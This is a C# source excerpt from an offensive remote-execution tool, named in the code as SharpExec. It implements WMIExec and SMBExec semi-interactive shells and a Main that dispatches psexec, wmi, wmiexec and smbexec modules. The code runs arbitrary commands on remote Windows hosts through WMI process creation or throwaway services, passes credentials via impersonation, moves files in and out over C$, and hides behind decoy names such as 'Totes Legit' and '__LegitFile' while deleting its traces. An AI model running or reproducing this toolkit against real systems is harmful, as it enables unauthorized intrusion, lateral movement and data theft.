//Handles WMI semi-interactive shell
public void wmiexec(string rhost, string executionPath, string cmdArgs, string domain, string username, string password)
{
Console.WriteLine();
Console.WriteLine("[+] Using WMIExec module semi-interactive shell");
Console.WriteLine("[+] Be careful what you execute");
Console.WriteLine();
string pwd = @"C:\";
string ln1 = "";
if (username == "" && password == "")
{
while (cmdArgs.ToLower() != "exit")
{
//Handles uploading file to current remote directory
if (cmdArgs.ToLower().Contains("put "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[1];
string remotePath;
if (pwd == @"C:\")
{
remotePath = pwd + put[2];
}
else
{
remotePath = pwd + @"\" + put[2];
}
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
Console.WriteLine();
}
}
//Handles downloading file from current remote directory
else if (cmdArgs.ToLower().Contains("get "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[2];
string remotePath;
if (pwd == @"C:\")
{
remotePath = pwd + put[1];
}
else
{
remotePath = pwd + @"\" + put[1];
}
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.get(localPath, remotePath, rhost, username, password, domain);
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
Console.WriteLine();
}
}
else if (cmdArgs.ToLower().Contains("help"))
{
Console.WriteLine("Commands Description");
Console.WriteLine("-------- -----------");
Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt File.txt");
Console.WriteLine("get Download file from current shell directory to local directory, get File.txt fullLocalPath\\File.txt");
Console.WriteLine("help Show help menu");
Console.WriteLine("exit Exit shell");
}
else
{
ManagementScope myScope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", rhost));
ManagementClass myClass = new ManagementClass(myScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
ManagementBaseObject myParams = myClass.GetMethodParameters("Create");
myParams["CurrentDirectory"] = pwd;
myParams["CommandLine"] = @"cmd /Q /c " + cmdArgs + @" > C:\__LegitFile 2>&1";
myClass.InvokeMethod("Create", myParams, null);
//Allows enough time to go elapse so output can be read
System.Threading.Thread.Sleep(2000);
//Handles reading output
string output = @"\\" + rhost + @"\C$\__LegitFile";
if (File.Exists(output))
{
using (StreamReader file = new StreamReader(output))
{
int counter = 0;
string ln;
//Reads output file
while ((ln = file.ReadLine()) != null)
{
//Helps handle bad path
if (ln.Contains("The system cannot find the path specified."))
{
ln1 = ln;
}
Console.WriteLine();
Console.WriteLine(ln);
counter++;
}
file.Close();
File.Delete(output);
}
}//End if file exits
//Handles changing directories
if (cmdArgs.ToLower().Contains("cd"))
{
//Handles if bad directory
if (ln1.Contains("The system cannot find the path specified."))
{
ln1 = "";
}
else
{
/*Handles switching to full path - cd C:\Users\ATTE
* Else handles new directory - cd Users\ATTE */
if (cmdArgs.ToLower().Contains(":"))
{
pwd = cmdArgs.Split(' ')[1];
}
else
{
string pwdOutput = pwd + @">";
if (pwdOutput.Contains(@":\>"))
{
pwd = pwdOutput.Replace(">", cmdArgs.Split(' ')[1]);
}
else if (cmdArgs != "cd ..")
{
pwd = pwd + @">";
pwd = pwd.Replace(">", @"\") + cmdArgs.Split(' ')[1];
}
}
}
//Handles cd .. functionality
if (cmdArgs.ToLower().Contains(".."))
{
string input = pwd;
string backslash = @"\";
int index = input.LastIndexOf(@backslash);
if (index > 0)
{
pwd = input.Substring(0, index);
if (pwd == "C:")
{
pwd = @"C:\";
}
}
else
{
pwd = @"C:\";
}
}
}//End if cmdArgs contain cd
}
Console.WriteLine();
Console.Write(pwd + @">");
cmdArgs = Console.ReadLine();
}
}
else
{
while (cmdArgs.ToLower() != "exit")
{
//Handles uploading file to current remote directory
if (cmdArgs.ToLower().Contains("put "))
{
try {
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[1];
string remotePath;
if (pwd == @"C:\")
{
remotePath = pwd + put[2];
}
else
{
remotePath = pwd + @"\" + put[2];
}
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
Console.WriteLine();
}
}
//Handles downloading file from current remote directory
else if (cmdArgs.ToLower().Contains("get "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[2];
string remotePath;
if (pwd == @"C:\")
{
remotePath = pwd + put[1];
}
else
{
remotePath = pwd + @"\" + put[1];
}
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.get(localPath, remotePath, rhost, username, password, domain);
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
Console.WriteLine();
}
}
else if (cmdArgs.ToLower().Contains("help"))
{
Console.WriteLine("Commands Description");
Console.WriteLine("-------- -----------");
Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt File.txt");
Console.WriteLine("get Download file from current shell directory to local directory, get File.txt fullLocalPath\\File.txt");
Console.WriteLine("help Show help menu");
Console.WriteLine("exit Exit shell");
}
else
{
ConnectionOptions myConnection = new ConnectionOptions();
string uname = domain + @"\" + username;
myConnection.Impersonation = ImpersonationLevel.Impersonate;
myConnection.EnablePrivileges = true;
myConnection.Timeout = new TimeSpan(0, 0, 30);
myConnection.Username = uname;
myConnection.Password = password;
ManagementScope myScope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", rhost), myConnection);
ManagementClass myClass = new ManagementClass(myScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
ManagementBaseObject myParams = myClass.GetMethodParameters("Create");
myParams["CurrentDirectory"] = pwd;
myParams["CommandLine"] = @"cmd /Q /c " + cmdArgs + @" > C:\__LegitFile 2>&1";
myClass.InvokeMethod("Create", myParams, null);
//Allows enough time to go elapse so output can be read
System.Threading.Thread.Sleep(2000);
using (new Impersonation(domain, username, password))
{
//Handles reading output
string output = @"\\" + rhost + @"\C$\__LegitFile";
if (File.Exists(output))
{
using (StreamReader file = new StreamReader(output))
{
int counter = 0;
string ln;
//Reads output file
while ((ln = file.ReadLine()) != null)
{
//Helps handle bad path
if (ln.Contains("The system cannot find the path specified."))
{
ln1 = ln;
}
Console.WriteLine();
Console.WriteLine(ln);
counter++;
}
file.Close();
File.Delete(output);
}
} //End if file exits
} //end impersonation
//Handles changing directories
if (cmdArgs.ToLower().Contains("cd"))
{
//Handles if bad directory
if (ln1.Contains("The system cannot find the path specified."))
{
ln1 = "";
}
else
{
/*Handles switching to full path - cd C:\Users\ATTE
* Else handles new directory - cd Users\ATTE */
if (cmdArgs.ToLower().Contains(":"))
{
pwd = cmdArgs.Split(' ')[1];
}
else
{
string pwdOutput = pwd + @">";
if (pwdOutput.Contains(@":\>"))
{
pwd = pwdOutput.Replace(">", cmdArgs.Split(' ')[1]);
}
else if (cmdArgs != "cd ..")
{
pwd = pwd + @">";
pwd = pwd.Replace(">", @"\") + cmdArgs.Split(' ')[1];
}
}
}
//Handles cd .. functionality
if (cmdArgs.ToLower().Contains(".."))
{
string input = pwd;
string backslash = @"\";
int index = input.LastIndexOf(@backslash);
if (index > 0)
{
pwd = input.Substring(0, index);
if (pwd == "C:")
{
pwd = @"C:\";
}
}
else
{
pwd = @"C:\";
}
}
}//End if cmdArgs contain cd
}
Console.WriteLine();
Console.Write(pwd + @">");
cmdArgs = Console.ReadLine();
}
}
}
//Handles SMBExec semi-interactive shell functionality
public void smbExec(string rhost, string serviceName, string serviceDisplayName, string cmdArgs, string domain, string username, string password)
{
Console.WriteLine();
Console.WriteLine("[+] Using SMBExec module semi-interactive shell");
Console.WriteLine("[+] Be careful what you execute");
Console.WriteLine();
if (username == "" && password == "")
{
Console.Write(@"C:\WINDOWS\system32>");
while (cmdArgs.ToLower() != "exit")
{
//Handles uploading file to current remote directory
if (cmdArgs.ToLower().Contains("put "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[1];
string remotePath = put[2];
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
Console.WriteLine();
}
}
//Handles downloading file from current remote directory
else if (cmdArgs.ToLower().Contains("get "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[2];
string remotePath = put[1];
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.get(localPath, remotePath, rhost, username, password, domain);
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
Console.WriteLine();
}
}
else if (cmdArgs.ToLower().Contains("help"))
{
Console.WriteLine("Commands Description");
Console.WriteLine("-------- -----------");
Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt fullLocalPath\\File.txt");
Console.WriteLine("get Download file from current shell directory to local directory, get fullLocalPath\\File.txt fullLocalPath\\File.txt");
Console.WriteLine("help Show help menu");
Console.WriteLine("exit Exit shell");
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
else if (cmdArgs.ToLower().Contains("cd"))
{
Console.WriteLine();
Console.WriteLine("You can't CD under SMBEXEC. Use full paths.");
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
else
{
using (var scmHandle = NativeMethods.OpenSCManager(rhost, null, NativeMethods.SCM_ACCESS.SC_MANAGER_CREATE_SERVICE))
{
if (scmHandle.IsInvalid)
{
throw new Win32Exception();
}
using (
var serviceHandle = NativeMethods.CreateService(
scmHandle,
serviceName,
serviceDisplayName,
NativeMethods.SERVICE_ACCESS.SERVICE_ALL_ACCESS,
NativeMethods.SERVICE_TYPES.SERVICE_WIN32_OWN_PROCESS,
NativeMethods.SERVICE_START_TYPES.SERVICE_DEMAND_START,
NativeMethods.SERVICE_ERROR_CONTROL.SERVICE_ERROR_IGNORE,
@"%COMSPEC% /Q /c echo " + cmdArgs + @" ^> \\" + rhost + @"\C$\__LegitFile 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
null,
IntPtr.Zero,
null,
null,
null))
{
try
{
NativeMethods.StartService(serviceHandle, 0, null);
}
catch
{
Console.WriteLine("[-]Error. Please check that you have appropriate rights and/or that service doesn't already exist");
}
try
{
System.Threading.Thread.Sleep(2000);
NativeMethods.DeleteService(serviceHandle);
}
catch
{
Console.WriteLine("[-] Error removing service");
Console.WriteLine();
Console.WriteLine("[-] Please delete service manually");
Console.WriteLine();
}
}
}
string output = @"\\" + rhost + @"\C$\__LegitFile";
if (File.Exists(output))
{
using (StreamReader file = new StreamReader(output))
{
int counter = 0;
string ln;
while ((ln = file.ReadLine()) != null)
{
Console.WriteLine();
Console.WriteLine(ln);
counter++;
}
file.Close();
File.Delete(output);
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
}
}
cmdArgs = Console.ReadLine();
}
}
else
{
Console.Write(@"C:\WINDOWS\system32>");
while (cmdArgs.ToLower() != "exit")
{
//Handles uploading file to current remote directory
if (cmdArgs.ToLower().Contains("put "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[1];
string remotePath = put[2];
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
Console.WriteLine();
}
}
//Handles downloading file from current remote directory
else if (cmdArgs.ToLower().Contains("get "))
{
try
{
Char delimiter = ' ';
String[] put = cmdArgs.Split(delimiter);
string localPath = put[2];
string remotePath = put[1];
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.get(localPath, remotePath, rhost, username, password, domain);
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
catch
{
Console.WriteLine();
Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
Console.WriteLine();
}
}
else if (cmdArgs.ToLower().Contains("help"))
{
Console.WriteLine("Commands Description");
Console.WriteLine("-------- -----------");
Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt fullLocalPath\\File.txt");
Console.WriteLine("get Download file from current shell directory to local directory, get fullLocalPath\\File.txt fullLocalPath\\File.txt");
Console.WriteLine("help Show help menu");
Console.WriteLine("exit Exit shell");
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
else if (cmdArgs.ToLower().Contains("cd"))
{
Console.WriteLine();
Console.WriteLine("You can't CD under SMBEXEC. Use full paths.");
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
else
{
using (new Impersonation(domain, username, password))
{
using (var scmHandle = NativeMethods.OpenSCManager(rhost, null, NativeMethods.SCM_ACCESS.SC_MANAGER_CREATE_SERVICE))
{
if (scmHandle.IsInvalid)
{
throw new Win32Exception();
}
using (
var serviceHandle = NativeMethods.CreateService(
scmHandle,
serviceName,
serviceDisplayName,
NativeMethods.SERVICE_ACCESS.SERVICE_ALL_ACCESS,
NativeMethods.SERVICE_TYPES.SERVICE_WIN32_OWN_PROCESS,
NativeMethods.SERVICE_START_TYPES.SERVICE_DEMAND_START,
NativeMethods.SERVICE_ERROR_CONTROL.SERVICE_ERROR_IGNORE,
@"%COMSPEC% /Q /c echo " + cmdArgs + @" ^> \\" + rhost + @"\C$\__LegitFile 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
null,
IntPtr.Zero,
null,
null,
null))
{
try
{
NativeMethods.StartService(serviceHandle, 0, null);
}
catch
{
Console.WriteLine("[-] Error starting service");
Console.WriteLine();
Console.WriteLine("[-] Please check that you have appropriate rights and/or that service doesn't already exist");
}
try
{
System.Threading.Thread.Sleep(2000);
NativeMethods.DeleteService(serviceHandle);
}
catch
{
Console.WriteLine("[-] Error removing service");
Console.WriteLine();
Console.WriteLine("[-] Please delete service manually");
Console.WriteLine();
}
}
}
string output = @"\\" + rhost + @"\C$\__LegitFile";
if (File.Exists(output))
{
using (StreamReader file = new StreamReader(output))
{
int counter = 0;
string ln;
while ((ln = file.ReadLine()) != null)
{
Console.WriteLine();
Console.WriteLine(ln);
counter++;
}
file.Close();
File.Delete(output);
Console.WriteLine();
Console.Write(@"C:\WINDOWS\system32>");
}
}
}
}
cmdArgs = Console.ReadLine();
}
}
}
static void Main(string[] args)
{
//Display help menu
if (args.Length <= 0 || args[0] == "help" || args[0] == "?")
{
Help please = new Help();
please.help();
}
else
{
//Get args
var comparer = StringComparer.OrdinalIgnoreCase;
var arguments = new Dictionary <string, string>(comparer);
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
}
//set variables
string module = "";
string rhost = "";
string domain = "";
string username = "";
string password = "";
string executionPath = "";
string cmdArgs = "";
string serviceName = "Legit";
string serviceDisplayName = "Totes Legit";
string uploadPath = "";
bool fileUploaded = false;
//Check if key created and if so set variable
if (arguments.ContainsKey("-m"))
{
module = arguments["-m"];
}
else
{
Console.WriteLine("[-] Missing required argument -m");
Console.WriteLine();
Console.WriteLine("[-] SharpExec did not run");
return;
}
if (arguments.ContainsKey("-i"))
{
rhost = arguments["-i"];
}
else
{
Console.WriteLine("[-] Missing required argument -i");
Console.WriteLine();
Console.WriteLine("[-] SharpExec did not run");
return;
}
if (arguments.ContainsKey("-e"))
{
executionPath = arguments["-e"];
}
if (arguments.ContainsKey("-d"))
{
domain = arguments["-d"];
}
if (arguments.ContainsKey("-u"))
{
username = arguments["-u"];
}
if (arguments.ContainsKey("-p"))
{
password = arguments["-p"];
}
if (arguments.ContainsKey("-c"))
{
cmdArgs = arguments["-c"];
}
if (arguments.ContainsKey("-f"))
{
uploadPath = arguments["-f"];
fileUploaded = true;
}
if (arguments.ContainsKey("--serviceName"))
{
serviceName = arguments["--serviceName"];
}
if (arguments.ContainsKey("--serviceDisplay"))
{
serviceDisplayName = arguments["-serviceDisplay"];
}
//Modules
//Upload file
if (uploadPath != "" && executionPath != "" && domain != "" && username != "" && password != "")
{
using (new Impersonation(domain, username, password))
{
try
{
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.upload(uploadPath, executionPath, rhost, username, password, domain);
System.Threading.Thread.Sleep(3000);
}
catch
{
Console.WriteLine("[-] Something went wrong with file upload. Please check syntax and run again");
}
}
}
else if (uploadPath != "" && executionPath != "")
{
try
{
FileAddRemove uploadFile = new FileAddRemove();
uploadFile.upload(uploadPath, executionPath, rhost, username, password, domain);
System.Threading.Thread.Sleep(3000);
}
catch
{
Console.WriteLine("[-] Something went wrong with file upload. Please check syntax and run again");
}
}
//PSExec
if (module.ToLower() == "psexec")
{
try
{
ManageService create = new ManageService();
create.PSExec(rhost, serviceName, serviceDisplayName, executionPath, cmdArgs, domain, username, password, fileUploaded);
//If file was uploaded remove it
if (uploadPath != "" && executionPath != "")
{
Console.WriteLine("[+] Sometimes, depending on what was executed your process/file may still be open");
Console.WriteLine("[+] Make sure process is not still running then press ENTER to remove file");
Console.ReadLine();
FileAddRemove deleteFile = new FileAddRemove();
deleteFile.delete(executionPath, rhost, username, password, domain);
}
}
catch
{
Console.WriteLine("[-] Something went wrong with PSEXEC module. Please check syntax and run again.");
}
}
//WMI
else if (module.ToLower() == "wmi")
{
try
{
ManageProcess create = new ManageProcess();
create.wmi(rhost, executionPath, cmdArgs, domain, username, password);
//If file was uploaded remove it
if (uploadPath != "" && executionPath != "")
{
Console.WriteLine("[+] Sometimes, depending on what was executed your process/file may still be open");
Console.WriteLine("[+] Make sure process is not still running then press ENTER to remove file");
Console.ReadLine();
//Sleep allows time for execution
System.Threading.Thread.Sleep(2000);
FileAddRemove deleteFile = new FileAddRemove();
deleteFile.delete(executionPath, rhost, username, password, domain);
}
}
catch
{
Console.WriteLine("[-] Something went wrong with WMI module. Please check syntax and run again.");
}
}
//WMIExec
else if (module.ToLower() == "wmiexec")
{
try
{
ManageProcess create = new ManageProcess();
create.wmiexec(rhost, executionPath, cmdArgs, domain, username, password);
}
catch
{
Console.WriteLine("[-] Something went wrong with WMIExec module. Please check syntax and run again.");
}
}
//SMBEXEC
else if (module.ToLower() == "smbexec")
{
try
{
ManageService create = new ManageService();
create.smbExec(rhost, serviceName, serviceDisplayName, cmdArgs, domain, username, password);
}
catch
{
Console.WriteLine("[-] Something went wrong with SMBExec module. Please check syntax and run again.");
}
}
else
{
Console.WriteLine("[-] Something went wrong. Please check syntax and run again.");
}
}
} //End Main